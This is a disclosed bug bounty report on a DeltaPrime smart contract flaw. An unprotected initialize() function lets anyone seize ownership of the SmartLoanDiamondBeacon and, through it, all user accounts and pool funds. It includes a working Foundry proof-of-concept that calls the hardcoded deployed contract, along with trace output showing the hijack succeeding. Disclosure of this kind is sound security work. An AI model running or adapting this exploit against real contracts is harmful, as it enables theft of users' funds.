'%3e%3cpath%20d='M12.4997%201.33325C10.39%201.33325%208.32772%201.95884%206.5736%203.13091C4.81947%204.30298%203.4523%205.96888%202.64496%207.91796C1.83763%209.86704%201.62639%2012.0118%202.03797%2014.0809C2.44955%2016.15%203.46545%2018.0506%204.95721%2019.5424C6.44897%2021.0342%208.34959%2022.0501%2010.4187%2022.4616C12.4878%2022.8732%2014.6326%2022.662%2016.5816%2021.8546C18.5307%2021.0473%2020.1966%2019.6801%2021.3687%2017.926C22.5408%2016.1719%2023.1663%2014.1096%2023.1663%2011.9999C23.1663%209.17094%2022.0425%206.45783%2020.0422%204.45745C18.0418%202.45706%2015.3287%201.33325%2012.4997%201.33325ZM12.4997%2021.3333C10.6537%2021.3333%208.84922%2020.7859%207.31436%2019.7603C5.7795%2018.7347%204.58322%2017.2771%203.8768%2015.5716C3.17039%2013.8662%202.98555%2011.9896%203.34568%2010.1791C3.70581%208.36859%204.59473%206.70554%205.90002%205.40025C7.20531%204.09496%208.86835%203.20605%2010.6788%202.84592C12.4893%202.48579%2014.3659%202.67063%2016.0714%203.37704C17.7768%204.08346%2019.2345%205.27974%2020.2601%206.8146C21.2856%208.34945%2021.833%2010.154%2021.833%2011.9999C21.833%2014.4753%2020.8497%2016.8492%2019.0993%2018.5996C17.349%2020.3499%2014.975%2021.3333%2012.4997%2021.3333Z'%20fill='white'/%3e%3cpath%20d='M19.167%208.06667C19.042%207.9425%2018.8731%207.8728%2018.697%207.8728C18.5208%207.8728%2018.3519%207.9425%2018.227%208.06667L10.8269%2015.4333L6.82695%2011.4333C6.70495%2011.3016%206.53562%2011.2237%206.35621%2011.2169C6.1768%2011.21%206.00201%2011.2747%205.87028%2011.3967C5.73856%2011.5187%205.66069%2011.688%205.65382%2011.8674C5.64694%2012.0468%205.71162%2012.2216%205.83362%2012.3533L10.8269%2017.3333L19.167%209.01333C19.2294%208.95136%2019.279%208.87762%2019.3129%208.79638C19.3467%208.71514%2019.3642%208.62801%2019.3642%208.54C19.3642%208.45199%2019.3467%208.36485%2019.3129%208.28361C19.279%208.20237%2019.2294%208.12864%2019.167%208.06667Z'%20fill='white'/%3e%3c/g%3e%3cdefs%3e%3cclipPath%20id='clip0_2790_31187'%3e%3crect%20width='24'%20height='24'%20fill='white'%20transform='translate(0.5)'/%3e%3c/clipPath%3e%3c/defs%3e%3c/svg%3e)
DeltaPrime Disclosed Report
Bug bounty report DeltaPrime Smart ContractsProtocol Privileged Owner Hijack via SmartLoanViewFacet::initialize()
Target
https://github.com/DeltaPrimeLabs/deltaprime-primeloans/tree/dev/main
Vulnerability Details
-
DeltaPrime maintains all users’ prime accounts in the pattern of “Proxy+implementation” where each prime account is a proxy pointing to the implementation contract. The implementation contract, i.e., “SmartLoanDiamondBeacon”, adheres to the EIP-2535 standard (Diamond) and can only be managed by the protocol owner. This means that if a malicious user can manage to become the owner of the "SmartLoanDiamondBeacon" contract, he/she can gain control over all users' Prime accounts.
-
When we reviewed the DeltaPrime code implementation, we did indeed discover such a vulnerability. Specifically, this vulnerability involves a facet contract called “SmartLoanViewFacet”. This contract includes an “initialize()” function, originally designed to initialize the owner for a new prime account. However, we noticed that a hacker can directly call the “SmartLoanViewFacet::initialize()” function to hijack the owner of the “SmartLoanDiamondBeacon” contract.
-
With ownership of the “SmartLoanDiamondBeacon” contract, the hacker can arbitrarily modify the functionalities of the implementation for all prime accounts, enabling the hacker to steal all the protocol funds, including the funds in all DeltaPrime lending pools and all Prime Accounts. The estimated total loss is >$50M. For example, the hacker can add a “freeBorrow()” function to borrow all the lending pool funds without any solvency check.
-
Furthermore, once the owner of the “SmartLoanDiamondBeacon” contract is hijacked, there is no way for DeltaPrime to take it back or mitigate the exploit, which means the protocol is totally controlled by the hacker.
Validation steps
Vulnerability Code:
https://github.com/DeltaPrimeLabs/deltaprime-primeloans/blob/dev/main/contracts/facets/SmartLoanViewFacet.sol#L42
POC:
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
interface ISmartLoanDiamondBeacon {
function initialize(address owner) external;
}
contract POC is Test {
string constant endpoint = "RPC_URL";
address constant diamond = 0x62Cf82FB0484aF382714cD09296260edc1DC0c6c;
address constant newOwner = 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4;// Note: it can be anyone.
function setUp() public {
vm.createSelectFork(endpoint, 234980496);
}
function test_hijackSmartLoanDiamondBeaconOwner() public {
ISmartLoanDiamondBeacon(diamond).initialize(newOwner);
}
}
Result:
Running 1 test for test/POC.t.sol:POC
[PASS] test_hijackSmartLoanDiamondBeaconOwner() (gas: 39748)
Traces:
[39748] POC::test_hijackSmartLoanDiamondBeaconOwner()
├─ [36709] 0x62Cf82FB0484aF382714cD09296260edc1DC0c6c::initialize(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4)
│ ├─ [29309] 0xD9EB3D537517040B339e6bea8dfA8EDe7f364512::initialize(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4) [delegatecall]
│ │ ├─ emit OwnershipTransferred(param0: 0x43D9A211BDdC5a925fA2b19910D44C51D5c9aa93, param1: 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4)
│ │ └─ ← ()
│ └─ ← ()
└─ ← ()
Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.28s
Attachments
hidden 
Comments on this report are hidden 
Details hidden
Participants (3) 
